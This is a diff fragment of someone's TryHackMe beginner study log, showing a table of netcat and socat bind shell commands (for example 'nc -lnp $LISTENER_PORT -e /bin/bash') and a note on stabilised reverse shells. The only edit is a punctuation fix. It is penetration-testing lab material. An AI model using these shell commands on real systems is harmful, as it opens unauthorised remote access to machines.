cardboard-iguana/cardboard-iguana.com/log/2021-10-27-tryhackme-complete-beginner.md

 | Bind shell (attacker)    | `nc $TARGET_IP $LISTENER_PORT`              | `socat TCP:$TARGET_IP:$LISTENER_PORT`                      |
 | Bind shell (target)      | `nc -lnp $LISTENER_PORT -e /bin/bash`        | `socat TCP-LISTEN:$LISTENER_PORT EXEC:"/bin/bash -li"`      |

-This gets us an interactive login shell right out the gate, though we’re still vulnerable to Ctrl+C. Note that when binding to PowerShell, use `powershell.exe,pipes` in order to force PowerShell to use UNIX-style STDIN/STDOUT.
+This gets us an interactive login shell right out the gate, though we're still vulnerable to Ctrl+C. Note that when binding to PowerShell, use `powershell.exe,pipes` in order to force PowerShell to use UNIX-style STDIN/STDOUT.

 We can use socat to create an auto-stabilized reverse shell on UNIX-like systems (though we will still need to use `stty` to set rows/columns).